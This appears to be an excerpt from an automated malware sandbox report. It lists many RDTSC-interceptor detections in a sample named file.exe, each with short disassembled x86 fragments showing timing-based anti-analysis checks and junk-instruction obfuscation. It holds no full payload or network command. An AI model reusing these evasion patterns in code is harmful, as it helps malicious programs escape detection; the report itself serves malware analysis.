Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C881A second address: 13C881E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C984E second address: 13C98C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e call 00007F0F04CBD323h 0x00000013 mov dword ptr [ebp+122D30E4h], eax 0x00000019 pop edi 0x0000001a mov dword ptr [ebp+122D1A47h], edi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F0F04CBD318h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c pushad 0x0000003d cld 0x0000003e mov ecx, edx 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 jl 00007F0F04CBD320h 0x00000048 pushad 0x00000049 jl 00007F0F04CBD316h 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 popad 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C98C8 second address: 13C98CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C98CE second address: 13C98DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0F04CBD316h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CA9C2 second address: 13CA9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CA9C6 second address: 13CAA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD31Ah 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0F04CBD318h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 sbb bx, BCB7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jns 00007F0F04CBD317h 0x00000050 mov dword ptr [ebp+122D1F36h], eax 0x00000056 push 00000000h 0x00000058 mov dword ptr [ebp+12480687h], eax 0x0000005e xchg eax, esi 0x0000005f jmp 00007F0F04CBD325h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CAA53 second address: 13CAA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBBBF second address: 13CBBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBBC3 second address: 13CBC5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F0F0527E411h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0F0527E408h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007F0F0527E411h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D2196h], edx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F0F0527E408h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov bx, di 0x00000055 mov dword ptr [ebp+122D2BC5h], esi 0x0000005b xchg eax, esi 0x0000005c jmp 00007F0F0527E413h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jp 00007F0F0527E406h 0x0000006b pushad 0x0000006c popad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C89A4 second address: 13C89A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C89A9 second address: 13C89CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E416h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C89CD second address: 13C89D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C89D1 second address: 13C89D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C48C0 second address: 13C48CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C48CA second address: 13C4929 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F0F0527E40Ah 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+1248114Dh], edi 0x0000001e mov bl, F2h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 movsx ebx, di 0x0000002a mov eax, dword ptr [ebp+122D0EBDh] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0F0527E408h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a push FFFFFFFFh 0x0000004c movzx edi, dx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 pop edi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C4929 second address: 13C492F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBE5C second address: 13CBE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2588 second address: 13D25A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D25A3 second address: 13D25A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D25A9 second address: 13D25B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D25B2 second address: 13D25B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D25B8 second address: 13D25BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2724 second address: 13D2729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D28B8 second address: 13D28C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F04CBD316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D28C2 second address: 13D28D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007F0F0527E406h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2A28 second address: 13D2A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2A2E second address: 13D2A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B5E70 second address: 13B5E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D77EC second address: 13D77F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D77F0 second address: 13D77F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D78C0 second address: 13D78C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D78C4 second address: 13D78E7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jbe 00007F0F04CBD31Ch 0x00000013 ja 00007F0F04CBD316h 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D78E7 second address: 13D78EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D78EB second address: 13D7903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F0F04CBD31Bh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DE9FA second address: 13DEA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1373022 second address: 1373030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1373030 second address: 137306A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F0527E406h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F0527E417h 0x0000001b jmp 00007F0F0527E40Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDE38 second address: 13DDE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDF97 second address: 13DDFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0F0527E40Ch 0x0000000e ja 00007F0F0527E40Eh 0x00000014 push esi 0x00000015 pop esi 0x00000016 jnc 00007F0F0527E406h 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F0F0527E406h 0x00000024 jmp 00007F0F0527E40Fh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E235A second address: 13E2361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E551B second address: 13E553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Fh 0x0000000c jmp 00007F0F0527E40Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E553B second address: 13E5567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Bh 0x00000007 jmp 00007F0F04CBD329h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E99DC second address: 13E99F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9B3A second address: 13E9B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0F04CBD316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9B44 second address: 13E9B78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0F0527E40Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007F0F0527E416h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9B78 second address: 13E9B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Dh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9DFD second address: 13E9E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jbe 00007F0F0527E406h 0x0000000e pop esi 0x0000000f jmp 00007F0F0527E40Bh 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F0F0527E406h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9FA8 second address: 13E9FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F0F04CBD316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0F04CBD326h 0x00000011 pop esi 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007F0F04CBD316h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9FD4 second address: 13E9FDE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F0527E406h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA2CC second address: 13EA2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA2D0 second address: 13EA2D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA2D4 second address: 13EA322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F04CBD324h 0x0000000d pushad 0x0000000e jno 00007F0F04CBD316h 0x00000014 ja 00007F0F04CBD316h 0x0000001a jc 00007F0F04CBD316h 0x00000020 jmp 00007F0F04CBD326h 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push edx 0x0000002b pop edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA322 second address: 13EA328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA328 second address: 13EA32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA32F second address: 13EA34C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0F0527E406h 0x0000000a jmp 00007F0F0527E413h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA4CE second address: 13EA4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA4D2 second address: 13EA4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F0F0527E406h 0x0000000f jmp 00007F0F0527E413h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7C38 second address: 13B7C46 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7C46 second address: 13B7C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7C4A second address: 13B7C7A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D1F04h], ebx 0x00000012 lea eax, dword ptr [ebp+1248DA2Fh] 0x00000018 stc 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0F04CBD324h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7C7A second address: 1396515 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0F0527E40Fh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F0F0527E408h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 cmc 0x00000029 call dword ptr [ebp+122D1F25h] 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8330 second address: 13B833A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B833A second address: 13B833F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B833F second address: 13B8365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F04CBD316h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jp 00007F0F04CBD316h 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0F04CBD31Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B843B second address: 13B843F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B85A6 second address: 13B85C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F04CBD320h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B85C2 second address: 13B85E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8D0C second address: 13B8D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8D12 second address: 13B8D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8F84 second address: 13B8F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8F8A second address: 13B8F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8F8E second address: 13B8FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D2A6Ah] 0x0000000f mov ecx, 02B9A001h 0x00000014 lea eax, dword ptr [ebp+1248DA2Fh] 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F0F04CBD318h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D39F8h] 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d jnc 00007F0F04CBD320h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8FDE second address: 1397042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F0527E415h 0x0000000f nop 0x00000010 mov edi, eax 0x00000012 call dword ptr [ebp+122D1865h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0F0527E411h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EE78E second address: 13EE794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EE91D second address: 13EE921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EEBDF second address: 13EEC08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD329h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d js 00007F0F04CBD32Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EEC08 second address: 13EEC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E412h 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EEC21 second address: 13EEC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0F04CBD316h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0F04CBD316h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4A4F second address: 13F4A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F3814 second address: 13F3818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
